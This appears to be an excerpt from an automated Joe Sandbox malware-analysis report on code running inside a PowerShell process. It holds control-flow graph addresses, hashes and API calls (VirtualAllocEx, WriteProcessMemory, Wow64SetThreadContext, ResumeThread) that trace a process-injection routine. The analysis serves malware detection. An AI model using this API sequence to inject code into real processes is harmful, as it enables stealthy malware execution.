35b8998-35b89a1 73->78 81 35b8ebb 74->81 77->60 79 35b8a0c-35b8a12 78->79 80 35b89a3-35b89e7 78->80 79->36 84 35b8a18-35b8a28 79->84 89 35b89e9-35b89ef 80->89 90 35b89f0-35b89fc 80->90 87 35b8ec5 81->87 84->36 92 35b8a2e-35b8a81 VirtualAllocEx 84->92 93 35b8ecc 87->93 89->90 90->81 94 35b8a02-35b8a06 90->94 99 35b8a8a-35b8aa8 92->99 100 35b8a83-35b8a89 92->100 98 35b8ed3 93->98 94->79 96 35b8e5f-35b8e72 94->96 96->77 103 35b8eda 98->103 99->87 102 35b8aae-35b8ab5 99->102 100->99 106 35b8abb-35b8ac2 102->106 107 35b8b3c-35b8b43 102->107 108 35b8ee1 103->108 106->93 110 35b8ac8-35b8acf 106->110 107->98 109 35b8b49-35b8b50 107->109 114 35b8eeb 108->114 111 35b8b56-35b8b71 call 35b7314 109->111 112 35b8e45-35b8e58 109->112 110->107 113 35b8ad1-35b8b23 VirtualAllocEx 110->113 111->103 121 35b8b77-35b8b7e 111->121 112->96 116 35b8b2c-35b8b36 113->116 117 35b8b25-35b8b2b 113->117 120 35b8ef2 114->120 116->107 117->116 126 35b8ef9 120->126 124 35b8e2b-35b8e3e 121->124 125 35b8b84-35b8b8d 121->125 124->112 125->36 127 35b8b93-35b8b99 125->127 130 35b8f03 126->130 127->36 129 35b8b9f-35b8baa 127->129 129->36 133 35b8bb0-35b8bb6 129->133 130->36 134 35b8cb9-35b8cca 133->134 135 35b8bbc-35b8bc1 133->135 134->36 138 35b8cd0-35b8ce4 call 35b7314 134->138 135->36 136 35b8bc7-35b8bda 135->136 136->36 140 35b8be0-35b8bf3 136->140 138->120 144 35b8cea-35b8cf1 138->144 140->36 145 35b8bf9-35b8c0e 140->145 146 35b8df7-35b8e0a 144->146 147 35b8cf7-35b8cfd 144->147 145->108 151 35b8c14-35b8c18 145->151 161 35b8e11-35b8e24 146->161 147->36 148 35b8d03-35b8d14 147->148 148->126 153 35b8d1a-35b8d1e 148->153 154 35b8c9f-35b8ca2 151->154 155 35b8c1e-35b8c27 151->155 157 35b8d29-35b8d31 153->157 158 35b8d20-35b8d23 153->158 154->36 159 35b8ca8-35b8cab 154->159 155->36 160 35b8c2d-35b8c30 155->160 157->36 162 35b8d37-35b8d41 157->162 158->157 159->36 163 35b8cb1-35b8cb3 159->163 160->36 164 35b8c36-35b8c66 160->164 161->124 162->41 165 35b8d47-35b8d59 call 35b7320 162->165 163->134 163->135 164->36 175 35b8c6c-35b8c85 call 35b7314 164->175 165->130 171 35b8d5f-35b8d66 165->171 173 35b8d68-35b8da6 ResumeThread 171->173 174 35b8dc3-35b8dd6 171->174 176 35b8da8-35b8dae 173->176 177 35b8daf-35b8dbc 173->177 182 35b8ddd-35b8df0 174->182 180 35b8c8a-35b8c8c 175->180 176->177 181 35b8dbe-35b8f74 177->181 177->182 180->114 183 35b8c92-35b8c99 180->183 181->85 182->146 183->154 183->161
                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 035B8A6A
                                                                                                        • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 035B8B0C
                                                                                                          • Part of subcall function 035B7314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E62514,00000000,?,?,?,00000000,00000000,?,035B8B6F,?,00000000,?), ref: 035B96FC
                                                                                                        • ResumeThread.KERNELBASE(?), ref: 035B8D8F
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 035B90F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 4270437565-0
                                                                                                        • Opcode ID: 6a34eae097e97aaf3585b90e697dbd19ecf2722fb2d7c50aa83bf7f0ba2963a8
                                                                                                        • Instruction ID: 4bc3b585fd5d08d47007b7226b7b542eac6cc3c7f2e1b3a964c8add313d39765
                                                                                                        • Opcode Fuzzy Hash: 6a34eae097e97aaf3585b90e697dbd19ecf2722fb2d7c50aa83bf7f0ba2963a8
                                                                                                        • Instruction Fuzzy Hash: 1342AF70A0025ACFEB24DF65E850BDEB7B6BF84300F1485A9D909AB3A0DB359D85CF51
                                                                                                        Function 07D01F18 Relevance: 1.7, Strings: 1, Instructions: 458COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 189 7d01f18-7d01f3a 190 7d01f40-7d01f45 189->190 191 7d020b7-7d02102 189->191 192 7d01f47-7d01f4d 190->192 193 7d01f5d-7d01f69 190->193 197 7d02108-7d0210d 191->197 198 7d0225d-7d02278 191->198 194 7d01f51-7d01f5b 192->194 195 7d01f4f 192->195 200 7d02062-7d0206c 193->200 201 7d01f6f-7d01f72 193->201 194->193 195->193 203 7d02125-7d02129 197->203 204 7d0210f-7d02115 197->204 216 7d0227a-7d022a2 198->216 217 7d0220f-7d02212 198->217 209 7d0207a-7d02080 200->209 210 7d0206e-7d02077 200->210 201->200 205 7d01f78-7d01f7f 201->205 206 7d02208-7d0220c 203->206 207 7d0212f-7d02133 203->207 211 7d02117 204->211 212 7d02119-7d02123 204->212 205->191 213 7d01f85-7d01f8a 205->213 206->217 214 7d02173 207->214 215 7d02135-7d02146 207->215 218 7d02082-7d02084 209->218 219 7d02086-7d02092 209->219 211->203 212->203 222 7d01fa2-7d01fa6 213->222 223 7d01f8c-7d01f92 213->223 228 7d02175-7d02177 214->228 215->198 243 7d0214c-7d02151 215->243 224 7d022a8-7d022ad 216->224 225 7d0244c-7d0247c 216->225 226 7d02220-7d02226 217->226 227 7d02214-7d0221d 217->227 220 7d02094-7d020b4 218->220 219->220 222->200 233 7d01fac-7d01fb0 222->233 230 7d01f94 223->230 231 7d01f96-7d01fa0 223->231 234 7d022c5-7d022c9 224->234 235 7d022af-7d022b5 224->235 257 7d024b5-7d024bf 225->257 258 7d0247e-7d0249b 225->258 236 7d02228-7d0222a 226->236 237 7d0222c-7d02238 226->237 228->206 238 7d0217d-7d02181 228->238 230->222 231->222 244 7d01fd0 233->244 245 7d01fb2-7d01fce 233->245 240 7d023f4-7d023fe 234->240 241 7d022cf-7d022d3 234->241 246 7d022b7 235->246 247 7d022b9-7d022c3 235->247 248 7d0223a-7d0225a 236->248 237->248 238->206 239 7d02187-7d02196 238->239 274 7d02198-7d0219e 239->274 275 7d021ae-7d02205 239->275 250 7d02400-7d02409 240->250 251 7d0240c-7d02412 240->251 252 7d02313 241->252 253 7d022d5-7d022e6 241->253 259 7d02153-7d02159 243->259 260 7d02169-7d02171 243->260 255 7d01fd2-7d01fd4 244->255 245->255 246->234 247->234 262 7d02414-7d02416 251->262 263 7d02418-7d02424 251->263 266 7d02315-7d02317 252->266 253->225 284 7d022ec-7d022f1 253->284 255->200 267 7d01fda-7d01fe7 255->267 269 7d024c1-7d024c5 257->269 270 7d024c8-7d024ce 257->270 290 7d02505-7d0250a 258->290 291 7d0249d-7d024af 258->291 271 7d0215b 259->271 272 7d0215d-7d02167 259->272 260->228 277 7d02426-7d02449 262->277 263->277 266->240 278 7d0231d-7d02321 266->278 303 7d01fee-7d01ff0 267->303 280 7d024d0-7d024d2 270->280 281 7d024d4-7d024e0 270->281 271->260 272->260 282 7d021a0 274->282 283 7d021a2-7d021a4 274->283 278->240 288 7d02327-7d0232b 278->288 293 7d024e2-7d02502 280->293 281->293 282->275 283->275 295 7d022f3-7d022f9 284->295 296 7d02309-7d02311 284->296 288->240 298 7d02331-7d02357 288->298 290->291 291->257 301 7d022fb 295->301 302 7d022fd-7d02307 295->302 296->266 298->240 315 7d0235d-7d02361 298->315 301->296 302->296 307 7d01ff2-7d01ff8 303->307 308 7d02008-7d0205f 303->308 311 7d01ffa 307->311 312 7d01ffc-7d01ffe 307->312 311->308 312->308 316 7d02363-7d0236c 315->316 317 7d02384 315->317 318 7d02373-7d02380 316->318 319 7d0236e-7d02371 316->319 320 7d02387-7d02394 317->320 321 7d02382 318->321 319->321 323 7d0239a-7d023f1 320->323 321->320
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: _
                                                                                                        • API String ID: 0-701932520
                                                                                                        • Opcode ID: 2ef2cfbda21a4d7c2c70975b034d790fc92afbc7e22eb40c17e0eccb8b580f34
                                                                                                        • Instruction ID: 20f2587a988516cf7dc849bd23380720674779792ea1767b3df3cff1d8bbeebb
                                                                                                        • Opcode Fuzzy Hash: 2ef2cfbda21a4d7c2c70975b034d790fc92afbc7e22eb40c17e0eccb8b580f34
                                                                                                        • Instruction Fuzzy Hash: A4F121B1B0530ADFCB259B68C8087AEFBA2BF85311F14D06AD9558B2D1DB31E845C7E1
                                                                                                        Function 035B72F0 Relevance: 1.7, APIs: 1, Instructions: 156processCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 325 35b72f0-35b9029 327 35b902b-35b902e 325->327 328 35b9031-35b9038 325->328 327->328 329 35b903a-35b9040 328->329 330 35b9043-35b9059 328->330 329->330 331 35b905b-35b9061 330->331 332 35b9064-35b9107 CreateProcessW 330->332 331->332 334 35b9109-35b910f 332->334 335 35b9110-35b9188 332->335 334->335 342 35b919a-35b91a1 335->342 343 35b918a-35b9190 335->343 344 35b91b8 342->344 345 35b91a3-35b91b2 342->345 343->342 346 35b91b9 344->346 345->344 346->346
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 035B90F4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 04e932a4212df3a82a335850aefc1ed66fe190719fbf0ecb45e02dc87f883c91
                                                                                                        • Instruction ID: d33c4fc768edcd9955d0ecad8bc37323cb08396f2cb84a63a62ca6d5bd82bc66
                                                                                                        • Opcode Fuzzy Hash: 04e932a4212df3a82a335850aefc1ed66fe190719fbf0ecb45e02dc87f883c91
                                                                                                        • Instruction Fuzzy Hash: CA51287190125ADFDF24CF99D840BDEBBB5BF48310F1484AAE908B7250D7759A85CF50
                                                                                                        Function 035B9678 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 348 35b9678-35b96c6 350 35b96c8-35b96ce 348->350 351 35b96d0-35b9709 WriteProcessMemory 348->351 350->351 352 35b970b-35b9711 351->352 353 35b9712-35b9733 351->353 352->353
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E62514,00000000,?,?,?,00000000,00000000,?,035B8B6F,?,00000000,?), ref: 035B96FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 047cbd6e6f975934aa585f092d9a0225cfe7d420c3ccfcddfc0c5d9131cfffd7
                                                                                                        • Instruction ID: 9fa805a6a2f4b038389552972e63a5f6c437b8b653e8fa95e40784a5c67b24fc
                                                                                                        • Opcode Fuzzy Hash: 047cbd6e6f975934aa585f092d9a0225cfe7d420c3ccfcddfc0c5d9131cfffd7
                                                                                                        • Instruction Fuzzy Hash: E0213AB59003099FDB10CF9AD885BDEFBF4FB48320F10842AE518A7250D378A544CFA4
                                                                                                        Function 035B7314 Relevance: 1.6, APIs: 1, Instructions: 63injectionCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 355 35b7314-35b96c6 357 35b96c8-35b96ce 355->357 358 35b96d0-35b9709 WriteProcessMemory 355->358 357->358 359 35b970b-35b9711 358->359 360 35b9712-35b9733 358->360 359->360
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,00000000,00000000,18E62514,00000000,?,?,?,00000000,00000000,?,035B8B6F,?,00000000,?), ref: 035B96FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 65a1549a337d00817793887125415e593432dfc2dc5943ef636b7721bacecbd4
                                                                                                        • Instruction ID: 24da3208260a58d3d9f85fc400ff325906d468a24649adfcbf1cce892f25237d
                                                                                                        • Opcode Fuzzy Hash: 65a1549a337d00817793887125415e593432dfc2dc5943ef636b7721bacecbd4
                                                                                                        • Instruction Fuzzy Hash: 1D21E4B19003599FDB10CF9AD984BDEFBF4FB48320F54842AE958A7250D378A944CFA5
                                                                                                        Function 035B91E9 Relevance: 1.6, APIs: 1, Instructions: 61threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 362 35b91e9-35b9230 364 35b923c-35b9268 Wow64SetThreadContext 362->364 365 35b9232-35b923a 362->365 366 35b926a-35b9270 364->366 367 35b9271-35b9292 364->367 365->364 366->367
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,035B8923), ref: 035B925B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 2e90381a4c3f1e72a0363a3779d2367e31a4c0373e7c50b1dec1ddd941cfa511
                                                                                                        • Instruction ID: 457e03905b9dc44034971bbeb53873de4cba746e673624ba416564c8785c418f
                                                                                                        • Opcode Fuzzy Hash: 2e90381a4c3f1e72a0363a3779d2367e31a4c0373e7c50b1dec1ddd941cfa511
                                                                                                        • Instruction Fuzzy Hash: E31147B6C042098FDB10CF9AD844BDEFBF4EB88220F14802AD468A3650D778A5458FA5
                                                                                                        Function 035B7320 Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 376 35b7320-35b9230 378 35b923c-35b9268 Wow64SetThreadContext 376->378 379 35b9232-35b923a 376->379 380 35b926a-35b9270 378->380 381 35b9271-35b9292 378->381 379->378 380->381
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,035B8923), ref: 035B925B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: d6106f4b4d5f494378ff32a8dc42eb2a6548ed4414a1b3b5ed89e1bd5e3535c8
                                                                                                        • Instruction ID: a92235b9b4f7496405ae64e35f908f6b3e006662698f1bc48a62405a9dcf491d
                                                                                                        • Opcode Fuzzy Hash: d6106f4b4d5f494378ff32a8dc42eb2a6548ed4414a1b3b5ed89e1bd5e3535c8
                                                                                                        • Instruction Fuzzy Hash: 0C1126B1D003498FDB10CF9AD884BDEFBF5FB89220F148429E568A3650D778A545CFA5
                                                                                                        Function 035B72FC Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 369 35b72fc-35b9230 371 35b923c-35b9268 Wow64SetThreadContext 369->371 372 35b9232-35b923a 369->372 373 35b926a-35b9270 371->373 374 35b9271-35b9292 371->374 372->371 373->374
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,?,035B8923), ref: 035B925B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1751350367.00000000035B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 035B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_35b0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 0e77d37bc3e36029d72fbba804b078738071acb1abdafd52b66aa3f9e1941356
                                                                                                        • Instruction ID: 770c0e1afc9d5cc7222df6efc7c91f9e9f4beea86640f12cde7d4f95ff56abeb
                                                                                                        • Opcode Fuzzy Hash: 0e77d37bc3e36029d72fbba804b078738071acb1abdafd52b66aa3f9e1941356
                                                                                                        • Instruction Fuzzy Hash: 891126B1D003498FDB10CF9AD844BDEFBF5FB88220F14802AE568A3650D778A545CFA5
                                                                                                        Function 07D009C8 Relevance: .4, Instructions: 358COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 963 7d009c8-7d009eb 964 7d009f1-7d009f6 963->964 965 7d00bc6-7d00bdd 963->965 966 7d009f8-7d009fe 964->966 967 7d00a0e-7d00a12 964->967 975 7d00c14-7d00c19 965->975 976 7d00bdf-7d00c0e 965->976 969 7d00a00 966->969 970 7d00a02-7d00a0c 966->970 971 7d00b73-7d00b7d 967->971 972 7d00a18-7d00a1c 967->972 969->967 970->967 977 7d00b8b-7d00b91 971->977 978 7d00b7f-7d00b88 971->978 973 7d00a1e-7d00a2d 972->973 974 7d00a2f 972->974 979 7d00a31-7d00a33 973->979 974->979 981 7d00c31-7d00c35 975->981 982 7d00c1b-7d00c21 975->982 976->975 980 7d00d7b-7d00dad 976->980 984 7d00b93-7d00b95 977->984 985 7d00b97-7d00ba3 977->985 979->971 988 7d00a39-7d00a59 979->988 1012 7d00dbd 980->1012 1013 7d00daf-7d00dbb 980->1013 986 7d00d2a-7d00d34 981->986 987 7d00c3b-7d00c3d 981->987 989 7d00c23 982->989 990 7d00c25-7d00c2f 982->990 991 7d00ba5-7d00bc3 984->991 985->991 996 7d00d42-7d00d48 986->996 997 7d00d36-7d00d3f 986->997 993 7d00c4d 987->993 994 7d00c3f-7d00c4b 987->994 1016 7d00a78 988->1016 1017 7d00a5b-7d00a76 988->1017 989->981 990->981 999 7d00c4f-7d00c51 993->999 994->999 1002 7d00d4a-7d00d4c 996->1002 1003 7d00d4e-7d00d5a 996->1003 999->986 1005 7d00c57-7d00c59 999->1005 1004 7d00d5c-7d00d78 1002->1004 1003->1004 1009 7d00c69 1005->1009 1010 7d00c5b-7d00c67 1005->1010 1015 7d00c6b-7d00c6d 1009->1015 1010->1015 1018 7d00dbf-7d00dc1 1012->1018 1013->1018 1015->986 1021 7d00c73-7d00c75 1015->1021 1022 7d00a7a-7d00a7c 1016->1022 1017->1022 1019 7d00dc3-7d00dc9 1018->1019 1020 7d00e0d-7d00e17 1018->1020 1023 7d00dd7-7d00df4 1019->1023 1024 7d00dcb-7d00dcd 1019->1024 1026 7d00e22-7d00e28 1020->1026 1027 7d00e19-7d00e1f 1020->1027 1029 7d00c77-7d00c7d 1021->1029 1030 7d00c8f-7d00c93 1021->1030 1022->971 1031 7d00a82-7d00a84 1022->1031 1048 7d00df6-7d00e07 1023->1048 1049 7d00e5a-7d00e5f 1023->1049 1024->1023 1037 7d00e2a-7d00e2c 1026->1037 1038 7d00e2e-7d00e3a 1026->1038 1039 7d00c81-7d00c8d 1029->1039 1040 7d00c7f 1029->1040 1034 7d00c95-7d00c9b 1030->1034 1035 7d00cad-7d00d27 1030->1035 1032 7d00a94 1031->1032 1033 7d00a86-7d00a92 1031->1033 1041 7d00a96-7d00a98 1032->1041 1033->1041 1042 7d00c9d 1034->1042 1043 7d00c9f-7d00cab 1034->1043 1046 7d00e3c-7d00e57 1037->1046 1038->1046 1039->1030 1040->1030 1041->971 1047 7d00a9e-7d00abe 1041->1047 1042->1035 1043->1035 1061 7d00ac0-7d00ac6 1047->1061 1062 7d00ad6-7d00ada 1047->1062 1048->1020 1049->1048 1063 7d00ac8 1061->1063 1064 7d00aca-7d00acc 1061->1064 1065 7d00af4-7d00af8 1062->1065 1066 7d00adc-7d00ae2 1062->1066 1063->1062 1064->1062 1069 7d00aff-7d00b01 1065->1069 1067 7d00ae4 1066->1067 1068 7d00ae6-7d00af2 1066->1068 1067->1065 1068->1065 1071 7d00b03-7d00b09 1069->1071 1072 7d00b19-7d00b70 1069->1072 1073 7d00b0b 1071->1073 1074 7d00b0d-7d00b0f 1071->1074 1073->1072 1074->1072
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9b170ad691c051be9cc0a696300d431f946ac195950f6b4e5d5c08f06bec32ca
                                                                                                        • Instruction ID: deecedee794e83300b42b52491f7b34e769073c2d54ef9df85e70c2cb7a32ce5
                                                                                                        • Opcode Fuzzy Hash: 9b170ad691c051be9cc0a696300d431f946ac195950f6b4e5d5c08f06bec32ca
                                                                                                        • Instruction Fuzzy Hash: 28B149B171430AAFDB249A69981076AFBA5EFC5611F24E07BD846CB2C1DB31C841C7E1
                                                                                                        Function 07D013A0 Relevance: .3, Instructions: 339COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1076 7d013a0-7d013c6 1077 7d01572-7d01590 1076->1077 1078 7d013cc-7d013d1 1076->1078 1086 7d01542-7d0154e 1077->1086 1087 7d01592-7d015ba 1077->1087 1079 7d013d3-7d013d9 1078->1079 1080 7d013e9-7d013ed 1078->1080 1082 7d013db 1079->1082 1083 7d013dd-7d013e7 1079->1083 1084 7d013f3-7d013f5 1080->1084 1085 7d0151e-7d01528 1080->1085 1082->1080 1083->1080 1090 7d01405 1084->1090 1091 7d013f7-7d01403 1084->1091 1088 7d01536-7d0153c 1085->1088 1089 7d0152a-7d01533 1085->1089 1097 7d01550-7d0156f 1086->1097 1094 7d015c0-7d015c5 1087->1094 1095 7d016ec-7d0171d 1087->1095 1088->1086 1092 7d0153e-7d01540 1088->1092 1093 7d01407-7d01409 1090->1093 1091->1093 1092->1097 1093->1085 1098 7d0140f-7d01413 1093->1098 1100 7d015c7-7d015cd 1094->1100 1101 7d015dd-7d015e1 1094->1101 1111 7d0172d 1095->1111 1112 7d0171f-7d0172b 1095->1112 1102 7d01415-7d01424 1098->1102 1103 7d01426 1098->1103 1104 7d015d1-7d015db 1100->1104 1105 7d015cf 1100->1105 1107 7d015e7-7d015e9 1101->1107 1108 7d0169e-7d016a8 1101->1108 1109 7d01428-7d0142a 1102->1109 1103->1109 1104->1101 1105->1101 1113 7d015f9 1107->1113 1114 7d015eb-7d015f7 1107->1114 1115 7d016b5-7d016bb 1108->1115 1116 7d016aa-7d016b2 1108->1116 1109->1085 1118 7d01430-7d01432 1109->1118 1119 7d0172f-7d01731 1111->1119 1112->1119 1117 7d015fb-7d015fd 1113->1117 1114->1117 1120 7d016c1-7d016cd 1115->1120 1121 7d016bd-7d016bf 1115->1121 1117->1108 1126 7d01603-7d01605 1117->1126 1123 7d01442 1118->1123 1124 7d01434-7d01440 1118->1124 1127 7d01733-7d01752 1119->1127 1128 7d0179f-7d017a9 1119->1128 1129 7d016cf-7d016e9 1120->1129 1121->1129 1130 7d01444-7d01446 1123->1130 1124->1130 1133 7d01607-7d0160d 1126->1133 1134 7d0161f-7d0162a 1126->1134 1163 7d01762 1127->1163 1164 7d01754-7d01760 1127->1164 1131 7d017b2-7d017b8 1128->1131 1132 7d017ab-7d017af 1128->1132 1130->1085 1137 7d0144c-7d0144e 1130->1137 1138 7d017ba-7d017bc 1131->1138 1139 7d017be-7d017ca 1131->1139 1140 7d01611-7d0161d 1133->1140 1141 7d0160f 1133->1141 1147 7d01642-7d0169b 1134->1147 1148 7d0162c-7d01632 1134->1148 1143 7d01450-7d01456 1137->1143 1144 7d01468-7d01473 1137->1144 1145 7d017cc-7d017ea 1138->1145 1139->1145 1140->1134 1141->1134 1151 7d01458 1143->1151 1152 7d0145a-7d01466 1143->1152 1153 7d01482-7d0148e 1144->1153 1154 7d01475-7d01478 1144->1154 1158 7d01634 1148->1158 1159 7d01636-7d01638 1148->1159 1151->1144 1152->1144 1161 7d01490-7d01492 1153->1161 1162 7d0149c-7d014a3 1153->1162 1154->1153 1158->1147 1159->1147 1161->1162 1169 7d014aa-7d014ac 1162->1169 1166 7d01764-7d01766 1163->1166 1164->1166 1166->1128 1167 7d01768-7d01785 1166->1167 1176 7d01787-7d01799 1167->1176 1177 7d017ed-7d017f2 1167->1177 1170 7d014c4-7d0151b 1169->1170 1171 7d014ae-7d014b4 1169->1171 1173 7d014b6 1171->1173 1174 7d014b8-7d014ba 1171->1174 1173->1170 1174->1170 1176->1128 1177->1176
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.1786825555.0000000007D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D00000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_7d00000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ba682f5e1a26185ae2b6858ec8928426ecccb3ccec99287b21a7b1fdc36f2c1c
                                                                                                        • Instruction ID: fe148e8ee3d68a7d228145abea841aa93a6abe70e5f6f6f28d73af8973d0ac8a
                                                                                                        • Opcode Fuzzy Hash: ba682f5e1a26185ae2b6858ec8928426ecccb3ccec99287b21a7b1fdc36f2c1c
                                                                                                        • Instruction Fuzzy Hash: 3EB117B570030ADFCB259A69981476EFBB6AFC2311F28906AD845CB2D1DB32C941C7E1
                                                                                                        Function 07D000F0 Relevance: .3, Instructions: 323COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
